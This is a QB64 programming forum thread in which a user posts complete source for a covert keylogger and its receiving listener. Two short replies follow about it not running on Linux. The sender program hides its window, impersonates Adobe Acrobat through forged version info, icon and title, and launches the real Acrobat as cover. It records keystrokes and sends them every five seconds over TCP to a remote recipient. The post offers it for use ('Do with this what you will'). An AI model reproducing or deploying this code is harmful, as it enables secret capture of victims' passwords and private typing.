QB64.org Forum

Active Forums => Programs => Topic started by: SpriggsySpriggs on May 05, 2020, 03:31:16 pm

Title: Keylogger over TCP/IP
Post by: SpriggsySpriggs on May 05, 2020, 03:31:16 pm

Using some of the code out there for making a hidden mouse and key logger on the Wiki I decided to try to make a keylogger that would be truly sneaky. Behold, a keylogger that runs in the background and LOOKS like Adobe Acrobat, even launching the program (if it is installed)! It runs in the background sending the keystrokes to the recipient every 5 seconds to be put into a file on the recipient's hard drive. Do with this what you will. MWAAHHAHAHA!

Code for recipient's side:

Code: QB64: [Select]

1. $SCREENHIDE
2. F = FREEFILE
3. OPEN "logger.txt" FOR OUTPUT AS #F
4. c = _OPENHOST("TCP/IP:300") 'or any other port that you decide to use for both sides
5. IF c THEN
6.     DO
7.         client = _OPENCONNECTION(c)
8.     LOOP UNTIL client
9.     DO
10.         GET #client, , b$
11.         IF b$ <> "" THEN PRINT #F, b$
12.         b$ = ""
13.         _LIMIT 120
14.     LOOP 'UNTIL INKEY$ = CHR$(27)
15. END IF

For the sender's side:

Code: QB64: [Select]

1. $SCREENHIDE
2. _TITLE "Adobe Acrobat 2020"
3. $VERSIONINFO:CompanyName=Adobe Inc.
4. $VERSIONINFO:FileDescription=Adobe Acrobat 2020
5. $VERSIONINFO:LegalCopyright=Copyright 1984-2020 Adobe Systems Inc
6. $VERSIONINFO:Web=https://adobe.com
7. $VERSIONINFO:Comments=Open and edit your PDFs naturally with Adobe Acrobat 2020!
8. $VERSIONINFO:PRODUCTVERSION#=1,2,4,5
9. $VERSIONINFO:FILEVERSION#=1,2,4,5
10. $VERSIONINFO:ProductName=Adobe Acrobat 2020
11. $EXEICON:'adobe icon.ico'
12. '$INCLUDE:'adobe icon.ico.bin.bas'
13. DECLARE LIBRARY
14.     FUNCTION GetAsyncKeyState% (BYVAL vkey AS LONG)
15. END DECLARE
16. '$DYNAMIC
17. IF COMMAND$ <> "" THEN
18.     SHELL _HIDE _DONTWAIT CHR$(34) + "C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe" + CHR$(34) + " " + CHR$(34) + COMMAND$ + CHR$(34)
19. ELSE
20.     SHELL _HIDE _DONTWAIT CHR$(34) + "C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe" + CHR$(34)
21. END IF
22. DIM theitem$(1)
23. c = _OPENCLIENT("TCP/IP:300:"+ recipientIP$)
24. IF c THEN
25.     LOGGER:
26.     REDIM theitem$(1)
27.     start = TIMER(0.01)
28.     DO: _LIMIT 100
29.         FOR thekey = &H30 TO &H5A
30.             IF GetAsyncKeyState(thekey) THEN
31.                 theitem$(a) = theitem$(a) + CHR$(thekey)
32.                 DO
33.                 LOOP UNTIL GetAsyncKeyState(thekey) = 0
34.             END IF
35.         NEXT
36.         IF GetAsyncKeyState(&H20) THEN
37.             theitem$(a) = theitem$(a) + " "
38.             DO
39.             LOOP UNTIL GetAsyncKeyState(&H20) = 0
40.         END IF
41.         IF GetAsyncKeyState(8) THEN
42.             theitem$(a) = theitem$(a) + "{BS}"
43.             DO
44.             LOOP UNTIL GetAsyncKeyState(8) = 0
45.         END IF
46.         ender = TIMER(0.01)
47.         IF ender >= start + 5 THEN
48.             GOTO LOGWRITE
49.         END IF
50.     LOOP
51.     LOGWRITE:
52.     FOR b = 0 TO a
53.         IF theitem$(b) <> "" THEN
54.             PUT #c, , theitem$(b)
55.         END IF
56.     NEXT
57.     GOTO LOGGER
58. ELSE SYSTEM
59. END IF

 

Title: Re: Keylogger over TCP/IP
Post by: _vince on May 05, 2020, 08:54:34 pm

Looks neat and clever but it's not running on my linux computer ;-(

I hope someone with windows will try it!

Title: Re: Keylogger over TCP/IP
Post by: SpriggsySpriggs on May 05, 2020, 10:44:28 pm

Quote from: _vince on May 05, 2020, 08:54:34 pm

Looks neat and clever but it's not running on my linux computer ;-(

I hope someone with windows will try it!

This is because the calls are Windows specific and some of the versioninfo is probably not available in Linux.

Text Only | Text with Attachments